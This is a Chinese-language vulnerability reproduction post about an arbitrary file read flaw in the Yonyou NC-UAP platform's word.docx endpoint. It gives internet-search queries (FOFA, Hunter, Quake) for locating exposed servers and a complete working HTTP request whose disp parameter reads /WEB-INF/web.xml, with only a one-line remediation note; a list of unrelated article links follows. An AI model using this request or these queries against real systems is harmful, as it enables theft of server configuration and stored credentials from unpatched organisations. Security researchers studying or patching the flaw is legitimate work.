用友NC word.docx 任意文件读取漏洞复现

0x01 产品描述:

用友NC-UAP平台是用友UFIDA系列的核心组成部分,旨在为企业提供一个强大的业务应用和信息化基础架构。作为NC产品体系的基础,NCUAP支持构建和集成各类企业级应用,包括但不限于工作流、审批流、预警平台等,并且能够与其他第三方系统无缝对接
0x02 漏洞描述:

用友NC-UAP平台word.docx存在任意文件读取漏洞,攻击者可以通过漏洞读取服务器上的敏感文件,包括配置文件、保存的账号密码等敏感信息从而导致进一步攻击。
0x03 搜索语句:

Fofa:app="用友-UFIDA-NC" || body="/Client/Uclient/UClient.dmg"

Hunter:body="/Client/Uclient/UClient.dmg"

Quake:body="/Client/Uclient/UClient.dmg"


0x04 漏洞复现:

复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Host: your-ip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Cookie: JSESSIONID=722CE6F799BBDE1ED1AFA8DC032B06C0.ncServer; JSESSIONID=6BDD75C8E88EE19ED89FF84865C74059.ncServer
If-Modified-Since: Mon, 07 Jan 2019 01:42:44 GMT
If-None-Match: W/"15737-1546825364907"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
其实防守也摸鱼1 小时前
ctfshow--Crypto(funnyrsa1-密码2)解题步骤
python·安全·web安全·网络安全·密码学·web·工具
云水一下2 小时前
企业跨地域安全通信实战:预共享密钥方式建立点到点加密隧道
安全·华为·ipsec vpn·下一代防火墙
闵孚龙3 小时前
AI Agent多智能体编排爆款解析:Claude Code Subagent、Fork、Coordinator、Bridge远程执行与安全治理全拆解
大数据·人工智能·安全
夏天测3 小时前
2026 年 5 月中旬网络安全深度预警:高危漏洞集中爆发、零日攻击常态化,企业面临多重安全挑战
安全·web安全
xian_wwq3 小时前
【学习笔记】探讨大模型应用安全建设系列2——安全评估:攻击面梳理与差距分析
笔记·学习·安全
NPE~3 小时前
[安全]互联网安全 — — 黑灰产概念科普
安全·科普·互联网安全·概念科普·黑灰产
devilnumber4 小时前
如何在java的Lambda中安全地修改外部变量?
java·安全·lambda
打码人的日常分享4 小时前
大模型及智能体安全风险防范与治理策略(PPT)
运维·网络·数据库·安全·云计算·制造
黎阳之光4 小时前
智慧水利堤坝监测:全域实景技术实现河流、水库隐患预警
大数据·人工智能·物联网·安全·数字孪生
福大大架构师每日一题4 小时前
ollama v0.23.3 发布:MLX 性能优化、安全加固与传输并发控制
安全·性能优化·ollama